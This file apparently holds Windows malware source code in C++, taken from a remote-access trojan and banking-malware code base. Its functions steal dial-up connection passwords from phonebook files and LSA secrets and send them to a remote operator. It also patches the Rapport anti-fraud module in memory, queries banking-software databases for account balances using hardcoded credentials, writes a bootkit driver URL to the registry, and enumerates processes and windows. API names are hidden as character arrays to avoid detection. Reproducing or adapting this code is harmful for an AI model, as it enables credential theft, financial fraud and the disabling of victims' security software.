void CDialupass::AnsiStringToLsaStr(LPSTR AValue,PLSA_UNICODE_STRING lsa) { char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); lsa->Length=plstrlenA(AValue)*2; lsa->MaximumLength=lsa->Length+2; lsa->Buffer=(PWSTR)malloc(lsa->MaximumLength); char FBwWp19[] = {'M','u','l','t','i','B','y','t','e','T','o','W','i','d','e','C','h','a','r','\0'}; MultiByteToWideCharT pMultiByteToWideChar=(MultiByteToWideCharT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp19); pMultiByteToWideChar(NULL,NULL,(LPCSTR)AValue,plstrlenA(AValue),lsa->Buffer,lsa->MaximumLength); }
bool DebugReportSaveUrlForBootkitDriver() { WCHAR key_path[] = L"SOFTWARE\\Classes\\CLSID\\{8CB0A413-0585-4886-B110-004B3BCAA9A8}"; CHAR url[500]; DWORD url_length = 0; HKEY key; DWORD opt = 0; if (!GetDriverUrl(url, sizeof(url))) return false; DWORD key_created = (DWORD)pRegCreateKeyExW(HKEY_LOCAL_MACHINE, key_path, 0, NULL, 0, KEY_WRITE, NULL, &key, &opt); DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "RegCreateKeyExW return 0x%X", key_created); if (key_created != ERROR_SUCCESS) return false; // Сохраняем на всякий пожарный с 0 в конце DWORD url_value_set = (DWORD)pRegSetValueExW(key, L"ID", 0, REG_BINARY, (const BYTE*)&url[0], (DWORD)plstrlenA(url)); DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "RegSetValueExW return 0x%X", url_value_set); if (url_value_set != ERROR_SUCCESS) return false; DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "Url key set (url=%s).", url); pRegCloseKey(key); return true; }
void CSystemManager::SendDialupassList() { CDialupass pass; int nPacketLen = 0; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); int i; for (i = 0; i < pass.GetMax(); i++) { COneInfo *pOneInfo = pass.GetOneInfo(i); for (int j = 0; j < STR_MAX; j++) nPacketLen += plstrlenA(pOneInfo->Get(j)) + 1; } char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); nPacketLen += 1; LPBYTE lpBuffer = (LPBYTE)pLocalAlloc(LPTR, nPacketLen); DWORD dwOffset = 1; for (i = 0; i < pass.GetMax(); i++) { COneInfo *pOneInfo = pass.GetOneInfo(i); for (int j = 0; j < STR_MAX; j++) { int nFieldLength = plstrlenA(pOneInfo->Get(j)) + 1; Gyfunction->my_memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength); dwOffset += nFieldLength; } } lpBuffer[0] = TOKEN_DIALUPASS; LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"LocalSize"); Send((LPBYTE)lpBuffer, pLocalSize(lpBuffer)); char DYrEN31[] = {'L','o','c','a','l','F','r','e','e','\0'}; LocalFreeT pLocalFree=(LocalFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DYrEN31); pLocalFree(lpBuffer); }
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam) { DWORD dwLength = 0; DWORD dwOffset = 0; DWORD dwProcessID = 0; LPBYTE lpBuffer = *(LPBYTE *)lParam; char strTitle[1024]; memset(strTitle, 0, sizeof(strTitle)); char CtxPW56[] = {'G','e','t','W','i','n','d','o','w','T','e','x','t','A','\0'}; GetWindowTextAT pGetWindowTextA=(GetWindowTextAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW56); pGetWindowTextA(hwnd, strTitle, sizeof(strTitle)); char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); char DYrEN52[] = {'I','s','W','i','n','d','o','w','V','i','s','i','b','l','e','\0'}; IsWindowVisibleT pIsWindowVisible=(IsWindowVisibleT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN52); if (!pIsWindowVisible(hwnd) || plstrlenA(strTitle) == 0) return true; char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); if (lpBuffer == NULL) lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1); dwLength = sizeof(DWORD) + plstrlenA(strTitle) + 1; LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"LocalSize"); dwOffset = pLocalSize(lpBuffer); char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'}; LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29); lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE); char CtxPW53[] = {'G','e','t','W','i','n','d','o','w','T','h','r','e','a','d','P','r','o','c','e','s','s','I','d','\0'}; GetWindowThreadProcessIdT pGetWindowThreadProcessId=(GetWindowThreadProcessIdT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW53); pGetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset)); Gyfunction->my_memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, plstrlenA(strTitle) + 1); *(LPBYTE *)lParam = lpBuffer; return true; }
LPCTSTR CDialupass::UTF8ToGB2312(char UTF8Str[]) { char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); if (UTF8Str == NULL || plstrlenA(UTF8Str) == 0) return ""; int nStrLen = plstrlenA(UTF8Str) * 2; char *lpWideCharStr = new char[nStrLen]; char *lpMultiByteStr = new char[nStrLen]; char FBwWp19[] = {'M','u','l','t','i','B','y','t','e','T','o','W','i','d','e','C','h','a','r','\0'}; MultiByteToWideCharT pMultiByteToWideChar=(MultiByteToWideCharT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp19); pMultiByteToWideChar(CP_UTF8, 0, UTF8Str, -1, (LPWSTR)lpWideCharStr, nStrLen); char DYrEN32[] = {'W','i','d','e','C','h','a','r','T','o','M','u','l','t','i','B','y','t','e','\0'}; WideCharToMultiByteT pWideCharToMultiByte=(WideCharToMultiByteT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DYrEN32); pWideCharToMultiByte(CP_ACP, 0, (LPWSTR)lpWideCharStr, -1, lpMultiByteStr, nStrLen, 0, 0); delete lpWideCharStr; return lpMultiByteStr; }
void DelSetInfo(LPCTSTR lpKeyName, LPCTSTR lpszValueName, LPCTSTR lpServiceName) { typedef int (WINAPI *lstrlenAT)( __in LPCSTR lpString ); lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrlenA"); char strSubKey[1024]; memset(strSubKey, 0, sizeof(strSubKey)); wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName); WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, lpKeyName, REG_SZ, (char *)lpszValueName, plstrlenA(lpszValueName), 3); }
DWORD CDialupass::GetRasEntryCount() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { nCount++; } } delete lpszReturnBuffer; return nCount; }
BOOL AntiRapport() { BOOL bRet = FALSE; UCHAR Buf; DWORD t; HMODULE hRapportModule; LPCSTR lpStr1; LPCSTR lpStr2; DWORD dwStr1; DWORD dwStr2; PVOID pvLogFix; PVOID pvFix; pLoadLibraryA("wininet.dll"); pLoadLibraryA("user32.dll"); hRapportModule =(HMODULE) pGetModuleHandleA("RapportUtil.dll"); if (hRapportModule) { lpStr1 = "periodic_checkpoint::periodic_checkpoint_thread"; lpStr2 = ".\\patching_sentry\\periodic_checkpoint.cpp"; dwStr1 = AntiRapportFindStr(hRapportModule,lpStr1,(DWORD)plstrlenA(lpStr1)); if (dwStr1) { dwStr2 = AntiRapportFindStr(hRapportModule,lpStr2,(DWORD)plstrlenA(lpStr2)); if (dwStr2) { pvFix = AnitRapportFindPushStrs(hRapportModule,dwStr1,dwStr2,&pvLogFix); if (pvFix) { Buf = 0x19; if (pWriteProcessMemory(pGetCurrentProcess(),pvFix,(PVOID)&Buf,sizeof(Buf),&t)) { bRet = TRUE; // DbgPrint(__FUNCTION__"(): rapport protect thread patched at %x\n",pvFix); } else { //DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError()); } if (pvLogFix) { Buf = 0xC3; if (pWriteProcessMemory(NtCurrentProcess(),pvLogFix,(PVOID)&Buf,sizeof(Buf),&t)) { // DbgPrint(__FUNCTION__"(): rapport log proc patched at %x\n",pvLogFix); } else { // DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError()); } } pSleep(4000); UnhookLibs(); } } } } return bRet; }
static char *GrabBalance(char *lpPath) { char *lpBalance=NULL; if (lpPath) { SQLHENV hEnv; SQLHANDLE hConn,hBalance; pSQLAllocHandle(SQL_HANDLE_ENV,NULL,&hEnv); pSQLSetEnvAttr(hEnv,SQL_ATTR_ODBC_VERSION,(void *)SQL_OV_ODBC3,NULL); pSQLAllocHandle(SQL_HANDLE_DBC,hEnv,&hConn); char szConfig[MAX_PATH]; pPathCombineA(szConfig,lpPath,"EXE\\default.cfg"); bool bUseAlias=pGetPrivateProfileIntA(szDatabaseParam,"aliasconnect",0,szConfig); char szUser[20]; pGetPrivateProfileStringA(szDatabaseParam,"username",0,szUser,20,szConfig); do { if (bUseAlias) { char szAlias[200]; int dwLen=(int)pGetPrivateProfileStringA(szDatabaseParam,"alias",0,szAlias,200,szConfig); char szStr[512]; SQLSMALLINT tmp; SQLRETURN retcode=(SQLRETURN)pSQLConnectA(hConn,(SQLCHAR*)szAlias,dwLen,(SQLCHAR*)szUser,lstrlenA(szUser),(SQLCHAR*)"sql",3); if ((retcode != SQL_SUCCESS) && (retcode != SQL_SUCCESS_WITH_INFO)) break; } else { char szConnectString[400]; int dwLen=(int)pGetPrivateProfileStringA(szDatabaseParam,"connectstring",0,szConnectString,200,szConfig); char *p; if (p=(char*)ppStrStrA(szConnectString,"%BSSRoot%")) { char szTmpStr[200]; plstrcpyA(szTmpStr,p+sizeof("%BSSRoot%")-1); plstrcpyA(p,lpPath); p+=(int)plstrlenA(lpPath); plstrcpyA(p,szTmpStr); dwLen=(int)plstrlenA(szConnectString)+1; } if (szConnectString[dwLen-1] != ';') { *(WORD*)&szConnectString[dwLen-1]=';'; dwLen++; } //char szUserPassword[40]; //dwLen+=(int)ppwsprintfA(szUserPassword,"UID=%s;PWD=sql;",szUser); plstrcatA(szConnectString,"UID="); plstrcatA(szConnectString,szUser); plstrcatA(szConnectString,";"); plstrcatA(szConnectString,"PWD=sql;"); //plstrcatA(szConnectString,szUserPassword); char szStr[512]; SQLSMALLINT tmp; SQLRETURN retcode=(SQLRETURN)pSQLDriverConnectA(hConn,NULL,(SQLCHAR*)szConnectString,SQL_NTS,(unsigned char *)szStr,sizeof(szStr),&tmp,SQL_DRIVER_COMPLETE); if ((retcode != SQL_SUCCESS) && (retcode != SQL_SUCCESS_WITH_INFO)) break; } SQLHANDLE hBalance; pSQLAllocHandle(SQL_HANDLE_STMT,hConn,&hBalance); pSQLPrepareA(hBalance,(SQLCHAR*)szGetBalanceStatement,sizeof(szGetBalanceStatement)); SQLINTEGER tmp=0; //SQLDOUBLE Rest=0; SQLINTEGER Rest=0; //pSQLBindCol(hBalance,1,SQL_C_DOUBLE,&Rest,sizeof(Rest),&tmp); pSQLBindCol(hBalance,1,SQL_C_SLONG,&Rest,sizeof(Rest),&tmp); SQLCHAR Account[25]={0}; pSQLBindCol(hBalance,2,SQL_C_CHAR,&Account,sizeof(Account),&tmp); pSQLExecute(hBalance); lpBalance=(char*)MemAlloc(1024); lpBalance[0] = 0; SQLRETURN dwRet; while (((dwRet=(SQLRETURN)pSQLFetch(hBalance)) == SQL_SUCCESS) || (dwRet == SQL_SUCCESS_WITH_INFO)) { //конвертируем число в строку char szRest[16], buf[16]; int i = 0; if( Rest < 0 ) { szRest[0] = '-'; Rest = -Rest; } else szRest[0] = ' '; do { buf[i++] = (Rest % 10) + '0'; Rest /= 10; } while( Rest ); szRest[i + 1] = 0; char* ps = szRest + 1; while( --i >= 0 ) *ps++ = buf[i]; //DWORD dwLen=(DWORD)wsprintfA(szTmp,"%s: %d",Account,Rest); if (lpBalance[0]) plstrcatA( lpBalance, "; " ); plstrcatA(lpBalance, Account); plstrcatA(lpBalance, ": "); plstrcatA(lpBalance, szRest); } lpBalance = (char*)MemRealloc(lpBalance, (DWORD)plstrlenA(lpBalance)); pSQLCloseCursor(hBalance); pSQLFreeHandle(SQL_HANDLE_STMT,hBalance); } while (false); pSQLDisconnect(hConn); pSQLFreeHandle(SQL_HANDLE_ENV,hEnv); pSQLFreeHandle(SQL_HANDLE_ENV,hBalance); pSQLFreeHandle(SQL_HANDLE_DBC,hConn); } return lpBalance; }
bool CDialupass::GetRasEntries() { int nCount = 0; char *lpPhoneBook[2]; char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1]; GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA"); pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1)); char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'}; lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22); plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\"); char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'}; lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01); plstrcatA(szPhoneBook1, m_lpCurrentUser); plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'}; SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39); pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0); char DQeBW01[] = {'%','s','\\','%','s','\0'}; char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk"); lpPhoneBook[0] = szPhoneBook1; lpPhoneBook[1] = szPhoneBook2; OSVERSIONINFO osi; osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'}; GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05); pGetVersionExA(&osi); if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5) { GetLsaPasswords(); } DWORD nSize = 1024 * 4; char *lpszReturnBuffer = new char[nSize]; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++) { memset(lpszReturnBuffer, 0, nSize); GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA"); pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]); for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1) { char *lpRealSection = (char *)UTF8ToGB2312(lpSection); char strDialParamsUID[256]; char strUserName[256]; char strPassWord[256]; char strPhoneNumber[256]; char strDevice[256]; memset(strDialParamsUID, 0, sizeof(strDialParamsUID)); memset(strUserName, 0, sizeof(strUserName)); memset(strPassWord, 0, sizeof(strPassWord)); memset(strPhoneNumber, 0, sizeof(strPhoneNumber)); memset(strDevice, 0, sizeof(strDevice)); char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'}; GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04); int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]); char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'}; lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03); if (nBufferLen > 0)//DialParamsUID=4326020 198064 { for(int j=0; j< (int)m_nRasCount; j++) { if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0) { plstrcpyA(strUserName, m_PassWords[j].login); plstrcpyA(strPassWord, m_PassWords[j].pass); m_PassWords[j].used=true; m_nUsed++; break; } } } pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]); pGetPrivateProfileStringA(lpSection, "Device", 0, strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]); char *lpRealDevice = (char *)UTF8ToGB2312(strDevice); char *lpRealUserName = (char *)UTF8ToGB2312(strUserName); Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord, strPhoneNumber, lpRealDevice); // delete lpRealSection; // delete lpRealUserName; // delete lpRealDevice; } } delete lpszReturnBuffer; return true; }
//写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) int WriteRegEx(HKEY MainKey,LPCTSTR SubKey,LPCTSTR Vname,DWORD Type,char* szData,DWORD dwData,int Mode) { HKEY hKey; DWORD dwDisposition; int iResult =0; __try { // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS); typedef LONG (APIENTRY *RegCreateKeyExAT) ( __in HKEY hKey, __in LPCSTR lpSubKey, __reserved DWORD Reserved, __in_opt LPSTR lpClass, __in DWORD dwOptions, __in REGSAM samDesired, __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes, __out PHKEY phkResult, __out_opt LPDWORD lpdwDisposition ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCreateKeyExAT pRegCreateKeyExA= (RegCreateKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegCreateKeyExA"); typedef LONG (APIENTRY *RegOpenKeyExAT)( __in HKEY hKey, __in_opt LPCSTR lpSubKey, __reserved DWORD ulOptions, __in REGSAM samDesired, __out PHKEY phkResult ); RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegOpenKeyExA"); typedef LONG (APIENTRY *RegSetValueExAT)( __in HKEY hKey, __in_opt LPCSTR lpValueName, __reserved DWORD Reserved, __in DWORD dwType, __in_bcount_opt(cbData) CONST BYTE* lpData, __in DWORD cbData ); RegSetValueExAT pRegSetValueExA=(RegSetValueExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegSetValueExA"); typedef LONG (APIENTRY *RegDeleteValueAT)( __in HKEY hKey, __in_opt LPCSTR lpValueName ); RegDeleteValueAT pRegDeleteValueA=(RegDeleteValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteValueA"); typedef LONG (APIENTRY *RegDeleteKeyAT)( __in HKEY hKey, __in LPCSTR lpSubKey ); RegDeleteKeyAT pRegDeleteKeyA=(RegDeleteKeyAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteKeyA"); typedef int (WINAPI *lstrlenAT)( __in LPCSTR lpString ); lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrlenA"); switch(Mode) { case 0: if(pRegCreateKeyExA(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS) __leave; case 1: if(pRegOpenKeyExA(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; switch(Type) { case REG_SZ: case REG_EXPAND_SZ: if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)szData,plstrlenA(szData)+1) == ERROR_SUCCESS) iResult =1; break; case REG_DWORD: if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS) iResult =1; break; case REG_BINARY: break; } break; case 2: if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; if (pRegDeleteKeyA(hKey,Vname) == ERROR_SUCCESS) iResult =1; break; case 3: if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; if (pRegDeleteValueA(hKey,Vname) == ERROR_SUCCESS) iResult =1; break; } } __finally { typedef LONG (APIENTRY *RegCloseKeyT) ( __in HKEY hKey); char YWsjU[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary(KIoFqQPSy),YWsjU); pRegCloseKey(MainKey); pRegCloseKey(hKey); } return iResult; }
LPBYTE CSystemManager::getProcessList() { HANDLE hSnapshot = NULL; HANDLE hProcess = NULL; HMODULE hModules = NULL; PROCESSENTRY32 pe32 = {0}; DWORD cbNeeded; char strProcessName[MAX_PATH] = {0}; LPBYTE lpBuffer = NULL; DWORD dwOffset = 0; DWORD dwLength = 0; char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'}; char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'}; CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10); hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hSnapshot == INVALID_HANDLE_VALUE) return NULL; pe32.dwSize = sizeof(PROCESSENTRY32); char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'}; LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20); lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024); lpBuffer[0] = TOKEN_PSLIST; dwOffset = 1; char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'}; lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01); LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize"); char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'}; OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14); char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'}; Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next); char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'}; Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First); char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'}; LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29); char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'}; EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15); char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'}; GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13); if(pProcess32First(hSnapshot, &pe32)) { do { hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID); if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8)) { pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded); pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName)); // 此进程占用数据大小 dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2; // 缓冲区太小,再重新分配下 if (pLocalSize(lpBuffer) < (dwOffset + dwLength)) lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE); Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD)); dwOffset += sizeof(DWORD); Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1); dwOffset += plstrlenA(pe32.szExeFile) + 1; Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1); dwOffset += plstrlenA(strProcessName) + 1; } } while(pProcess32Next(hSnapshot, &pe32)); } lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset, LMEM_ZEROINIT|LMEM_MOVEABLE); char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29); pCloseHandle(hSnapshot); return lpBuffer; }